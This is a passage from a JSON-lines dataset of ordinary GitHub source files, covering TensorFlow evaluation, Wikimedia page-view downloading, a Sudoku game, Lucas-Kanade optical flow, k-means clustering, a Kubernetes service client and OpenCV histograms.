path(\"contact_us/\",views.contact_us,name=\"contact_us\"),\n\n]","repo_name":"3ina/dental_clinic_app","sub_path":"clinic/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"16591162068","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport argparse\nimport sys\nimport tensorflow as tf\n\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\n\ndef read_and_decode(filename_queue, img_size):\n \"\"\"\n Function to read and decode the tfrecord file of the dataset\n Arg:\n filename_queue: list of the tfrecord files\n img_size: size (height/width) of the images (square aspect\n ratio)\n\n Returns:\n image, label: images and corresponding labels from the dataset\n \"\"\"\n # Define a reader and read the next record\n reader = tf.TFRecordReader()\n _, serialized_example = reader.read(filename_queue)\n\n # Decode the record read by the reader\n feature = {'image_raw': tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.int64)}\n features = tf.parse_single_example(serialized_example, features=feature)\n\n # Convert the image data from string back to the numbers\n image = tf.decode_raw(features['image_raw'], tf.float32)\n\n # Set the shape of the images\n image = tf.reshape(image, [img_size, img_size, 3])\n\n # Convert to between [-0.5, 0.5)\n image = image * (1.0 / 255) - 0.5\n\n # Convert label to an int32 scalar.\n label = tf.cast(features['label'], tf.int32)\n\n return image, label\n\ndef inputs(filename, batch_size, img_size):\n \"\"\"\n Function to\n Arg:\n filename: path to the tfrecord\n batch_size: size of the batch\n num_epochs: number of epochs/iterations\n img_size: size\n\n Returns:\n images, labels: images and labels for the batch\n \"\"\"\n with tf.name_scope('input'):\n # Create a list of filenames and pass it to a queue\n filename_queue = tf.train.string_input_producer([filename],\n num_epochs=2)\n\n image, label = read_and_decode(filename_queue, img_size)\n\n # Creates batches\n images, labels = tf.train.batch([image, label],\n batch_size=batch_size,\n capacity=100 + 3*batch_size,\n allow_smaller_final_batch=True,\n num_threads=2)\n\n return images, labels\n\n\ndef main(_):\n images, labels = inputs(filename=FLAGS.test_path,\n batch_size=FLAGS.batch_size,\n img_size=FLAGS.img_size)\n\n with tf.Session() as sess:\n # Initialize all global and local variables\n init_op = tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer())\n sess.run(init_op)\n\n tf.train.import_meta_graph('my-model.meta')\n \n\n # Coordinator\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess,\n coord=coord)\n try:\n while not coord.should_stop():\n label = sess.run(labels)\n print(len(label))\n except tf.errors.OutOfRangeError:\n print(\"end\")\n finally:\n coord.request_stop()\n\n coord.join(threads)\n sess.close()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--num_classes',\n type=int,\n default=14,\n help='Number of classes for the dataset.'\n )\n parser.add_argument(\n '--img_size',\n type=int,\n default=64,\n help='Size of the image to be fed to the model.'\n )\n parser.add_argument(\n '--batch_size',\n type=int,\n default=100,\n help='Batch size.'\n )\n parser.add_argument(\n '--test_path',\n type=str,\n default='tfrecord/test.tfrecords',\n help='Path to the test data (tfrecords file).'\n )\n parser.add_argument(\n '--checkpoint_dir',\n type=str,\n default='ckpt',\n help='Directory for load the model checkpoints.'\n )\n\n FLAGS, unparsed = parser.parse_known_args()\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)\n\n","repo_name":"alvinlee90/Robotics-Vanilla-CNN","sub_path":"evaluate_model.py","file_name":"evaluate_model.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29122691151","text":"from code_names_bot_dictionary_compiler.download.caches import WikiPageViewCache\nfrom code_names_bot_dictionary_compiler.download.api_downloader import download\nfrom config import WIKI_FILTERED_2, MISSING_WIKI_PAGE_VIEWS\n\nfrom urllib.parse import quote_plus\n\nGET_URL = (\n lambda page_title: f\"https://wikimedia.org/api/rest_v1/metrics/pageviews/per-article/en.wikipedia/all-access/user/{quote_plus(page_title)}/monthly/2021010100/2021123100\"\n)\n\n\ndef get_request_params(page_title):\n return {\n \"url\": GET_URL(page_title),\n \"headers\": {\n \"User-Agent\": \"CodeNamesBot/0.0 (nalu.zou@gmail.com) python-requests/0.0\"\n },\n }\n\n\ndef process_result(key, result):\n if result.status_code == 404:\n print(\"Not found\", key)\n with open(MISSING_WIKI_PAGE_VIEWS, \"a\") as file:\n file.write(key + \"\\n\")\n return None, True\n\n if result.status_code != 200:\n print(\"Invalid status code\", key, result.text)\n return None, False\n\n json = result.json()\n monthly_views = [item[\"views\"] for item in json[\"items\"]]\n return sum(monthly_views), True\n\n\ndef main():\n with open(WIKI_FILTERED_2, \"r\") as file:\n page_id_titles = file.read().splitlines()\n page_id_titles = map(\n lambda page_id_title: page_id_title.split(\"\\t\"), page_id_titles\n )\n page_titles = list(map(lambda page_id_title: page_id_title[1], page_id_titles))\n\n with open(MISSING_WIKI_PAGE_VIEWS, \"r\") as file:\n missing_page_views = set(file.read().splitlines())\n\n page_titles = list(\n filter(lambda page_title: page_title not in missing_page_views, page_titles)\n )\n\n download(\n keys=page_titles,\n get_request_params=get_request_params,\n cache=WikiPageViewCache(),\n process_result=process_result,\n chunk_size=20,\n download_rate=1.5,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AdeptLearner123/code-names-bot-dictionary-compiler-old","sub_path":"code_names_bot_dictionary_compiler/wiki_filter_3/download_api_wiki_page_views.py","file_name":"download_api_wiki_page_views.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42089303620","text":"__author__ = \"Sumit Sharma\"\n__copyright__ = \"Copyright 2022, Luna2 Project [OOD]\"\n__license__ = \"GPL\"\n__version__ = \"2.0\"\n__maintainer__ = \"Sumit Sharma\"\n__email__ = \"sumit.sharma@clustervision.com\"\n__status__ = \"Development\"\n\nINI_FILE = '/trinity/local/ondemand/3.0/config/luna.ini'\nLICENSE = '/trinity/local/ondemand/3.0/LICENSE.txt'\nLOG_DIR = '/var/log/luna'\nLOG_FILE = '/var/log/luna/luna2-web.log'\nEDITOR_KEYS = ['options', 'content', 'comment', 'prescript', 'partscript', 'postscript']\n\n\ndef filter_columns(table=None):\n \"\"\"\n This method remove the unnecessary fields from\n the dataset.\n \"\"\"\n response = False\n static = {\n 'node': ['name', 'group', 'osimage', 'osimagetag', 'setupbmc', 'bmcsetup', 'status', 'tpm_uuid'],\n 'nodeinterface': ['interface', 'ipaddress', 'macaddress', 'network', 'options'],\n 'nodesecrets': ['Node', 'name', 'path', 'content']\n }\n response = list(static[table])\n return response\n\n\ndef sortby(table=None):\n \"\"\"\n This method remove the unnecessary fields from\n the dataset.\n \"\"\"\n response = False\n static = {\n 'node': [\n 'name', 'hostname', 'group', 'osimage', 'osimagetag', 'interfaces', 'status', 'vendor', 'assettag',\n 'position', 'switch', 'switchport', 'setupbmc', 'bmcsetup', 'unmanaged_bmc_users', 'netboot',\n 'localinstall', 'bootmenu', 'roles', 'service', 'prescript', 'partscript',\n 'postscript','provision_interface', 'provision_method', 'provision_fallback',\n 'tpm_uuid', 'tpm_pubkey', 'tpm_sha256', 'comment', 'macaddress'\n ],\n 'nodeinterface': ['interface', 'ipaddress', 'macaddress', 'network'],\n 'nodesecrets': ['Node', 'name', 'path', 'content']\n }\n response = list(static[table])\n return response\n","repo_name":"clustervision/trinityx-ood","sub_path":"node/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8879077254","text":"# Given an integer N, print a possible solution to the knights tour problem.\n\n# Input : \n# N = 8\n# Output:\n# 0 59 38 33 30 17 8 63\n# 37 34 31 60 9 62 29 16\n# 58 1 36 39 32 27 18 7\n# 35 48 41 26 61 10 15 28\n# 42 57 2 49 40 23 6 19\n# 47 50 45 54 25 20 11 14\n# 56 43 52 3 22 13 24 5\n# 51 46 55 44 53 4 21 12\n\nfrom array import array\n\n\ndef print_matrix(matrix)->None:\n # Print the matrix\n for i in range(len(matrix)):\n for j in range(len(matrix)):\n print(matrix[i][j],end=\" \")\n print()\ndef solve(N):\n if N%2 != 0:\n print(\"No solution\")\n return None\n if N in [1,2,4]:\n print(\"No solution\")\n return None\n board = [[0 for i in range(N)] for j in range(N)]\n # Try diferent starting points\n for i in range(N):\n for j in range(N):\n # Warnsdorff’s algorithm\n # 1. Find the position with the fewest number of possible moves\n # 2. Move to that position\n # 3. Repeat until all squares are visited\n # 4. If no more moves are possible, backtrack\n # 5. If all squares are visited, stop\n wandorff(board,i,j,0)\nrow = [-2,-1,1,2,2,1,-1,-2]\ncol = [1,2,2,1,-1,-2,-2,-1]\ndef wandorff(board,i,j,move):\n # Check if the move is valid\n if i < 0 or i >= len(board) or j < 0 or j >= len(board) or board[i][j] != 0:\n return False\n # If the move is valid, make the move\n board[i][j] = move\n # If all the moves are done, print the board\n if move == len(board)**2-1:\n print_matrix(board)\n return True\n # Try all the possible moves\n for k in range(8):\n if wandorff(board,i+row[k],j+col[k],move+1):\n return True\n # If no move is possible, backtrack\n board[i][j] = 0\n return False\n\nif __name__ == \"__main__\":\n N = int(input())\n board = solve(N)\n if board:\n print_matrix(board)","repo_name":"GuillermoTafoya/AlgoToolboxSolutions","sub_path":"Advanced Algos - ITESM/The Knights Tour/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8796838733","text":"def intercala_vetores(a, b, c, tam1, tam2):\n # Recebe: vetores a, b e c, com tam1 e tam2 elementos, respectivamente.\n # Acao: constroi c intercalando os elementos de a e b.\n # Retorna: a quantidade de elementos copiados para c.\n # Obs.:\n # (a) a e b ja esta ordenados;\n # (b) a e b, individualmente, nao contem elementos repetidos;\n # (c) intercalar a e b em c ordenamente;\n # (d) c nao podera conter elementos repetidos;\n # (e) tam3 e no maximo tam1 + tam2, eventualmente sera menor.\n cont1 = 0\n cont2 = 0\n cont3 = 0\n while cont1 < tam1 or cont2 < tam2:\n if cont1 == tam1:\n c[cont3] = b[cont2]\n cont3 = cont3+1\n cont2 = cont2+1\n elif cont2 == tam2:\n c[cont3] = a[cont1]\n cont3 = cont3+1\n cont1 = cont1+1\n else:\n if a[cont1] < b[cont2]:\n c[cont3] = a[cont1]\n cont1 = cont1+1\n cont3 = cont3+1\n elif b[cont2] < a[cont1]:\n c[cont3] = b[cont2]\n cont2 = cont2+1\n cont3 = cont3+1\n else:\n c[cont3] = a[cont1]\n cont1 = cont1+1\n cont2 = cont2+1\n cont3 = cont3+1\n return cont3\n","repo_name":"neveSZ/fatecsp-ads","sub_path":"IAL-002/Listas/5-Listas Homogêneas/1-Vetores/Lista 01/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"33898853400","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 19 22:44:58 2020\n\n@author: joaom\n\"\"\"\nimport numpy as np\nimport SudokuSolver as Ss\nimport SudokuGUI\nfrom sqlitedict import SqliteDict\nfrom tkinter import Tk\nimport os.path\n\n\nclass Sudoku:\n \n def __init__(self, puzzle_number=1, user_name=\"User\"):\n self.user = self.login_user(user_name)\n self.game_over = False\n self.sudoku_id = puzzle_number\n # Chosen sudoku's state\n self.start_state = np.array(self.get_from_db(user_name + \".sqlite\", \"puzzles\", puzzle_number))\n self.state = np.copy(self.start_state)\n # Chosen sudoku's solution\n self.solution = np.array(self.get_from_db(user_name + \".sqlite\", \"solutions\", puzzle_number))\n # self.run_ui()\n \n def __str__(self, sdk=()):\n # String representation of the sudoku state\n if len(sdk) == 0:\n sdk = self.state\n length = len(sdk)\n sudoku_size = int(length**0.5)\n string = ''\n # Horizontal separator\n line = ''\n for i in range(length*3-sudoku_size+1):\n line += '-'\n line += '\\n'\n string += line\n # Fill each line\n for r in range(length):\n string += '|'\n for c in range(length):\n if sdk[r, c] == 0:\n string += ' '\n else:\n string += str(sdk[r, c])\n if (c+1) % sudoku_size == 0:\n string += '|'\n else:\n string += ' '\n string += '\\n'\n if (r+1) % sudoku_size == 0:\n string += line\n return string\n\n def change_sudoku(self, num: int) -> None:\n # Choose another sudoku\n # Chosen sudoku\n self.sudoku_id = num\n # Chosen sudoku's state\n self.state = np.array(self.get_from_db(self.user + \".sqlite\", \"puzzles\", self.sudoku_id))\n # Chosen sudoku's solution\n self.solution = np.array(self.get_from_db(self.user + \".sqlite\", \"solutions\", self.sudoku_id))\n \n def check_solution(self) -> bool:\n # Check solution's correctness\n if np.all(self.state == self.solution):\n return True\n return False\n\n def compute_solution(self) -> int:\n # Computes solution to given sudoku\n solver = Ss.SudokuSolver(self)\n solution = solver.solve()\n if not solution:\n return -1\n return self.save_to_db(self.user + \".sqlite\", \"solutions\", solution)\n\n def create_new_user(self, user_name: str) -> None:\n # Add new user to DB\n db_name = user_name + \".sqlite\"\n self.import_default_files(db_name)\n\n def draw_sudoku(self, solved=False) -> None:\n # Prints a legible form of sudoku to console\n if solved:\n print(Sudoku.__str__(self.solution))\n else:\n print(Sudoku.__str__(self))\n\n @staticmethod\n def get_from_db(db_name: str, table_name: str, sudoku_number: int) -> tuple:\n # Retrieve specified data from selected DB\n with SqliteDict(db_name, tablename=table_name, autocommit=True) as db:\n return db[table_name].get(sudoku_number, None)\n\n @staticmethod\n def import_data(db_name: str, file_name: str, table_name: str) -> None:\n # Imports data from file to SqliteDict DB\n temp_dict = dict()\n with open(file_name, \"r\") as f:\n for line in f:\n args = line.split(\": \")\n temp_dict.update({eval(args[0]): eval(args[1])})\n with SqliteDict(db_name, tablename=table_name, autocommit=True) as db:\n db[table_name] = temp_dict\n\n def import_default_files(self, db: str) -> None:\n # Imports the base puzzles and solutions for the creation of a new user\n self.import_data(db, \"puzzles.txt\", \"puzzles\")\n self.import_data(db, \"solutions.txt\", \"solutions\")\n\n def login_user(self, user_name: str) -> str:\n # Initialize user account with files from DB\n path = \"./Users.txt\"\n if os.path.isfile(path):\n with open(\"Users.txt\", \"r\") as f:\n for line in f:\n if line == user_name:\n return user_name # User exists\n self.create_new_user(user_name)\n with open(\"Users.txt\", \"a\") as f:\n f.write(user_name)\n return user_name\n\n def new_puzzle(self, board: np.array) -> None:\n # Get new puzzle\n self.start_state = board\n self.state = np.copy(self.start_state)\n solved_flg = self.compute_solution()\n if solved_flg == -1:\n print(\"WARNING: Could not compute solution to the puzzle! \\n\\t\\tPlease check the board's validity.\")\n self.start_state = np.array(self.get_from_db(self.user + \".sqlite\", \"puzzles\", self.sudoku_id))\n self.state = np.copy(self.start_state)\n else:\n puzzle_number = self.save_to_db(self.user + \".sqlite\", \"puzzles\", board)\n self.reset_sudoku()\n self.sudoku_id = puzzle_number\n\n def reset_sudoku(self) -> None:\n # Reset game state\n self.state = np.copy(self.start_state)\n self.game_over = False\n\n def run_ui(self):\n # Start the Sudoku UI\n root = Tk()\n SudokuGUI.SudokuUI(root, self)\n root.mainloop()\n\n @staticmethod\n def save_to_db(db_name: str, table_name: str, sudoku: tuple) -> int:\n # Save given sudoku state to selected DB\n with SqliteDict(db_name, tablename=table_name, autocommit=True) as db:\n temp_dict = db[table_name]\n temp_dict.update({len(db[table_name]) + 1: tuple(map(tuple, sudoku))})\n db[table_name] = temp_dict\n return len(db[table_name]) + 1\n","repo_name":"jogirao/sudoku","sub_path":"Sudoku.py","file_name":"Sudoku.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"10565618557","text":"import random\n\nimport numpy as np\nfrom scipy.signal import convolve2d\n\nimport cv2 as cv\n\nfrom math import exp, ceil\n\n\ndef gaussian2d(x, y, x_0=0, y_0=0, sigma_x=1, sigma_y=1, amp=1):\n return amp * exp(-((x - x_0) ** 2 / (2 * sigma_x ** 2) + (y - y_0) ** 2 / (2 * sigma_y ** 2)))\n\n\ndef identity_func(x, y, x_0=0, y_0=0):\n return 1\n\n\ndef rgb2gs(img):\n return np.dot(img[..., :3], [0.2125, 0.7154, 0.0721])\n\n\ndef img_offset(val, step, max_val):\n offset = max_val - val\n return offset if offset < step else 0\n\n\ndef img_block(img, partirion=(1, 1)):\n block_w, block_h = img.shape[1] // partirion[1], img.shape[0] // partirion[0]\n prev_y, prev_x = 0, 0\n cur_y, cur_x = 0, 0\n while (cur_y, cur_x) != img.shape:\n cur_y, cur_x = prev_y + block_h, prev_x + block_w\n cur_x += img_offset(cur_x, block_w, img.shape[1])\n cur_y += img_offset(cur_y, block_h, img.shape[0])\n if cur_x > img.shape[1]:\n cur_x %= img.shape[1]\n cur_y += block_h\n yield img[prev_y:cur_y, prev_x:cur_x]\n prev_x = cur_x\n if prev_x >= img.shape[1]:\n prev_x %= img.shape[1]\n prev_y += block_h\n\n\ndef img_block_pixelvice(img, block_shape=(5, 5)):\n rows, cols = img.shape\n block_rows, block_cols = block_shape\n col_parts = ceil(cols / block_cols)\n row_parts = ceil(rows / block_rows)\n for row in range(row_parts):\n for col in range(col_parts):\n diff_row, diff_col = block_rows, block_cols\n if (row + 1) * block_rows >= rows:\n diff_row = rows - row * block_rows\n if (col + 1) * block_cols >= cols:\n diff_col = cols - col * block_cols\n yield img[row * block_rows:row * block_rows + diff_row, col * block_cols:col * block_cols + diff_col]\n\n\n# TODO: weight function\ndef bias(left_top, right_bottom, deriv_x, deriv_y, deriv_t, weight_func=gaussian2d):\n\n bias_v = [0, 0]\n for row in range(left_top[0], right_bottom[0] + 1):\n for col in range(left_top[1], right_bottom[1] + 1):\n k = deriv_t[row, col] # * weight_func(row, col, offset_row, offset_col)\n bias_v[0] += k * deriv_x[row, col]\n bias_v[1] += k * deriv_y[row, col]\n return [-x for x in bias_v]\n\n\n# TODO: weight function\ndef coeff_matrix(left_top, right_bottom, deriv_x, deriv_y, weight_func):\n mat = np.zeros((2, 2))\n # print(right_bottom)\n # mat[0, 0] = np.sum((deriv_x[left_top[0]:right_bottom[0] + 1,\n # left_top[1]:right_bottom[1] + 1]) ** 2)\n # mat[0, 1] = mat[1, 0] = np.sum((deriv_y[left_top[0]:right_bottom[0] + 1,\n # left_top[1]:right_bottom[1] + 1]) *\n # (deriv_x[left_top[0]:right_bottom[0] + 1,\n # left_top[1]:right_bottom[1] + 1])\n # )\n #\n # mat[1, 1] = np.sum((deriv_y[left_top[0]:right_bottom[0] + 1,\n # left_top[1]:right_bottom[1] + 1]) ** 2)\n for row in range(left_top[0], right_bottom[0] + 1):\n for col in range(left_top[1], right_bottom[1] + 1):\n xy_deriv_product = deriv_x[row, col] * deriv_y[row, col]\n mat[0, 0] += deriv_x[row, col] ** 2\n mat[0, 1] += xy_deriv_product\n mat[1, 0] += xy_deriv_product\n mat[1, 1] += deriv_y[row, col] ** 2\n return mat\n\n\ndef merge_imgs(imgs):\n imgs_num = len(imgs)\n w, h = imgs[0].shape[1], imgs[0].shape[0]\n img = np.zeros((h, w * imgs_num))\n for index, cur_img in enumerate(imgs):\n img[0:h, w * index:w * (index + 1)] = cur_img\n return img\n\n\ndef LucasKanade(img_cur, img_next, features):\n Gt1 = np.reshape(np.asarray([[-1, -1], [-1, -1]]), (2, 2)) # for 1st image\n Gt2 = np.reshape(np.asarray([[1, 1], [1, 1]]), (2, 2)) # for 2nd image\n\n BLOCK_SHAPE_ROW = 5\n BLOCK_SHAPE_COL = 5\n\n sigma, ev_min, bias_prec = 1, 0.05, 2\n\n num_rows, num_cols = img_cur.shape\n\n Gx = np.reshape(np.asarray([[-1, 1], [-1, 1]]), (2, 2)) # for image 1 and image 2 in x direction\n Gy = np.reshape(np.asarray([[-1, -1], [1, 1]]), (2, 2)) # for image 1 and image 2 in y direction\n\n MAX_LEVEL = 4\n image0_pyramid = []\n image1_pyramid = []\n img1 = img_cur\n img2 = img_next\n\n for i in range(MAX_LEVEL):\n image0_pyramid.append(img1)\n image1_pyramid.append(img2)\n img1 = cv.pyrDown(img1)\n img2 = cv.pyrDown(img2)\n\n image0_pyramid = image0_pyramid[::-1]\n image1_pyramid = image1_pyramid[::-1]\n # u = np.zeros(shape=(image0_pyramid[0].shape[0] // 2, image0_pyramid[0].shape[1] // 2))\n #\n # v = np.zeros(shape=(image1_pyramid[0].shape[0] // 2, image1_pyramid[0].shape[1] // 2))\n\n initial_tracking_blocks = np.copy(features)\n # tracking_blocks = features // (2 ** MAX_LEVEL)\n tracking_blocks = features // 1\n g = np.zeros(shape=tracking_blocks.shape)\n # print(g)\n for img_cur, img_next in zip(image0_pyramid, image1_pyramid):\n\n # u = np.round(cv.pyrUp(u))\n # v = np.round(cv.pyrUp(v))\n\n deriv_x = (convolve2d(img_cur, Gx) + convolve2d(img_next, Gx)) / 2\n\n deriv_y = (convolve2d(img_cur, Gy) + convolve2d(img_next, Gy)) / 2\n\n deriv_t = convolve2d(img_cur, Gt1) + convolve2d(img_next, Gt2)\n\n for index, block in enumerate(tracking_blocks):\n\n col, row = block\n\n left_top = (row - BLOCK_SHAPE_ROW if row >= BLOCK_SHAPE_ROW else 0,\n col - BLOCK_SHAPE_COL if col >= BLOCK_SHAPE_COL else 0)\n right_bottom = (row + BLOCK_SHAPE_ROW + 1 if row + BLOCK_SHAPE_ROW + 1 < num_rows else num_rows - 1,\n col + BLOCK_SHAPE_COL + 1 if col + BLOCK_SHAPE_COL + 1 < num_cols else num_cols - 1)\n try:\n b = bias(left_top, right_bottom, deriv_x, deriv_y, deriv_t, gaussian2d)\n M = coeff_matrix(left_top, right_bottom, deriv_x, deriv_y, gaussian2d)\n\n\n except:\n continue\n\n min_ev = min(np.linalg.eigvals(M))\n if min_ev >= ev_min:\n result = np.matmul(np.linalg.pinv(M), b) / 2\n # u[row, col] += result[0]\n # v[row, col] += result[1]\n # tracking_blocks[index] = np.array([col + u[row, col], row + v[row, col]])\n # print(result)\n g[index] += result\n\n # tracking_blocks = np.round(tracking_blocks) * 2\n\n return initial_tracking_blocks, tracking_blocks + np.int32(g)\n","repo_name":"sMaxym/LucasKanade","sub_path":"py/pyramidal_lk_optical_flow.py","file_name":"pyramidal_lk_optical_flow.py","file_ext":"py","file_size_in_byte":6536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"22684547379","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 4 16:15:19 2017\n\n@author: sampathduddu\n\"\"\"\n\n#kmeans clustering\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndataset = pd.read_csv('curveball.csv')\n\n\n\ndataset_orig = dataset.iloc[:,:20]\ndataset = dataset_orig.iloc[:,6:]\n\nX = dataset.values\n \n\n\n# Find optimal number of clusters using elbow method\nfrom sklearn.cluster import KMeans\nwcss = []\nfor i in range(1, 21):\n kmeans = KMeans(n_clusters=i, random_state=0)\n kmeans.fit(X)\n wcss.append(kmeans.inertia_)\n\nplt.plot(range(1,21), wcss)\nplt.show()\n\n#Applying kmeans to the data set with the correct number of clusters\nkmeans = KMeans(n_clusters=5, random_state=0)\ny_kmeans = kmeans.fit_predict(X)\n\n\n\n# Visualizing the clusters\n#plt.scatter(X[y_kmeans == 0, 0],X[y_kmeans == 0, 1], s=100, c ='red', label = 'Cluster 1')\n#plt.scatter(X[y_kmeans == 1, 0],X[y_kmeans == 1, 1], s=100, c ='blue', label = 'Cluster 2')\n#plt.scatter(X[y_kmeans == 2, 0],X[y_kmeans == 2, 1], s=100, c ='green', label = 'Cluster 3')\n#plt.scatter(X[y_kmeans == 3, 0],X[y_kmeans == 3, 1], s=100, c ='orange', label = 'Cluster 4')\n#plt.scatter(X[y_kmeans == 4, 0],X[y_kmeans == 4, 1], s=100, c ='yellow', label = 'Cluster 5')\n#plt.scatter(kmeans.cluster_centers_[:,0], kmeans.cluster_centers_[:,1], s=300, c='brown', label='Centroids')\n#plt.show()\n \n ","repo_name":"dudduss/udemyMLCourse","sub_path":"Machine Learning A-Z Template Folder/Part 4 - Clustering/Section 24 - K-Means Clustering/kmeans_clustering.py","file_name":"kmeans_clustering.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5939294777","text":"from beecell.types.type_dict import dict_get\nfrom beecell.types.type_string import truncate\nfrom beedrones.k8s.client import k8sEntity, api_request\n\n\nclass K8sService(k8sEntity):\n \"\"\"K8sService\n \"\"\"\n @property\n def api(self):\n return self.manager.core_api\n\n @api_request\n def list(self, name=None):\n \"\"\"list services in a namespace or in all the namespaces\n\n :param name: service partial name\n :return: list of services\n \"\"\"\n if self.all_namespaces is True:\n services = self.api.list_service_for_all_namespaces()\n else:\n services = self.api.list_namespaced_service(self.default_namespace)\n\n res = services.to_dict().get('items', [])\n\n # filter services\n res = [s for s in res if name is None or (name is not None and dict_get(s, 'metadata.name').find(name) >= 0)]\n\n for i in res:\n i['metadata']['creation_timestamp'] = str(i['metadata']['creation_timestamp'])\n\n self.logger.debug('list services: %s' % truncate(res))\n return res\n\n @api_request\n def get(self, name):\n \"\"\"get service\n\n :param name: name of the service\n :return:\n \"\"\"\n service = self.api.read_namespaced_service(name, self.default_namespace)\n res = self.get_dict(service)\n self.logger.debug('get namespace %s service: %s' % (self.default_namespace, truncate(res)))\n return res\n\n @api_request\n def add(self, name, selector, port, target_port):\n \"\"\"add service\n\n :param name: service name\n :param selector: service selector. Ex. {'app': 'deployment'}\n :param port: service port\n :param target_port: service target port\n :return: service\n \"\"\"\n body = self.client.V1Service(\n api_version='v1',\n kind='Service',\n metadata=self.client.V1ObjectMeta(\n name=name\n ),\n spec=self.client.V1ServiceSpec(\n selector=selector,\n ports=[self.client.V1ServicePort(\n port=port,\n target_port=target_port\n )]\n )\n )\n res = self.api.create_namespaced_service(namespace=self.default_namespace, body=body)\n self.logger.debug('create namespace %s service: %s' % (self.default_namespace, truncate(res)))\n return res\n\n @api_request\n def delete(self, name):\n \"\"\"delete service\n\n :param name: service name\n \"\"\"\n namespace = self.default_namespace\n res = self.api.delete_namespaced_service(name, namespace)\n self.logger.debug('delete namespace %s service: %s' % (self.default_namespace, truncate(res)))\n return res\n","repo_name":"Nivola/beedrones","sub_path":"beedrones/k8s/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20193053157","text":"'''\nCreated on 13 Mar 2012\n\n@author: freynaud\n'''\n\nimport time\nimport threading\nfrom threading import Thread\n\n\n\nclass SnapshotListener(threading.Thread):\n '''\n classdocs\n ''' \n \n \n def __init__(self, group=None, target=None, name=None, \n args=(), kwargs=None, verbose=None,callback=None):\n threading.Thread.__init__(self, group=group, target=target, name=name, args=args, kwargs=kwargs, verbose=verbose)\n '''\n Constructor\n '''\n Thread.__init__(self, group, target, name, args, kwargs, verbose)\n self._callback = callback;\n self.last_check = self._get_current_time_in_seconds()\n self._loop_sleep_in_seconds = 1 \n \n \n def run(self):\n while not self._is_time_travel_detected() :\n time.sleep(self._loop_sleep_in_seconds)\n \n print(\"snapshot event\")\n if (self._callback):\n self._callback()\n \n \n \n def _is_time_travel_detected(self):\n previous = self.last_check\n current = self._get_current_time_in_seconds()\n delta = previous - current\n self.last_check = current\n if (abs(delta) > ( self._loop_sleep_in_seconds +1 )):\n print(\"system time travelled \"+str(delta)+\" seconds.\")\n return True\n else :\n return False\n \n def _get_current_time_in_seconds(self):\n now = time.time()\n seconds = int(round(now))\n print(time.strftime(\"%X\",time.gmtime(now)))\n return seconds\n\n","repo_name":"freynaud/commandCenter","sub_path":"SnapshortRevertedListener.py","file_name":"SnapshortRevertedListener.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"37797204180","text":"import cv2\nimport numpy as np\n\ndef create_histogram_image(cvimg):\n\n width = 256#cvimg.shape[1]\n h = np.zeros((cvimg.shape[0],width,3),dtype=cvimg.dtype )#np.zeros(cvimg.shape,dtype=cvimg.dtype)\n\n bins = np.arange(width).reshape(width,1)\n color = [(255,0,0),(0,255,0),(0,0,255)]\n\n for ch, col in enumerate(color):\n hist_item = cv2.calcHist([cvimg], [ch], None, [width], [0, 256])\n cv2.normalize(hist_item, hist_item, 0, 255, cv2.NORM_MINMAX)\n hist = np.int32(np.around(hist_item))\n pts = np.column_stack((bins, hist))\n cv2.polylines(h, [pts], False, col)\n\n h_image=np.flipud(h)\n\n return h_image\n\ndef create_grey_histogram_image(cvimg):\n\n width = 256#cvimg.shape[1]\n h = np.zeros((cvimg.shape[0],width,1),dtype=cvimg.dtype )#np.zeros(cvimg.shape,dtype=cvimg.dtype)\n\n bins = np.arange(width).reshape(width,1)\n color = [(255,0,0)]\n\n for ch, col in enumerate(color):\n hist_item = cv2.calcHist([cvimg], [ch], None, [width], [0, 256])\n cv2.normalize(hist_item, hist_item, 0, 255, cv2.NORM_MINMAX)\n hist = np.int32(np.around(hist_item))\n pts = np.column_stack((bins, hist))\n cv2.polylines(h, [pts], False, col)\n\n h_image=np.flipud(h)\n\n return h_image\n\ndef negate_img(cvimg):\n return 255 - cvimg\n\ndef bitwise_negate_img(cvimg):\n return cv2.bitwise_not(cvimg)\n\ndef convert2grey(cvimg):\n return cv2.cvtColor(cvimg,cv2.COLOR_BGR2GRAY)\n\ndef 